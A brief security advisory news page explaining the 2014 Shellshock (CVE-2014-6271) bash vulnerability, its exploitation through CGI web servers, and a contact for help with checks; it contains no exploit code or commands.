Floragasse 7 – 5th floor, 1040 Vienna
Subscribe to our Newsletter

News

Shellshock a.k.a. Bashbleed

What is Shellshock?

On 24/09/2014, a security vulnerability was published as CVE-2014-6271 (also Shellshock or Bashbleed). The vulnerability is in the command line software bash which is used in practically all Linux systems as the default shell. Due to an error when parsing environment variables, it is possible to execute arbitrary commands. The vulnerability can under certain circumstances be exploited by an external attacker.

Update 29/09/2014: The gap is already exploited for automated attacks, shown through the observation of Honeypot systems.

Impact

The danger is that bash is used implicitly in many places, whereby external attack opportunities over the Internet exist. Most obviously are attacks over web servers that offer CGI scripts. Running CGI scripts includes invoking the bash, whereby user inputs are entrained as environment variables. Therefore, it is possible for an attacker – under certain circumstances – to execute own commands on the vulnerable web server and thus to take over this web server!

More information about checks and rectification can be found here.

Contact

For more information or assistance with checks please contact: bashbleed@sba-research.org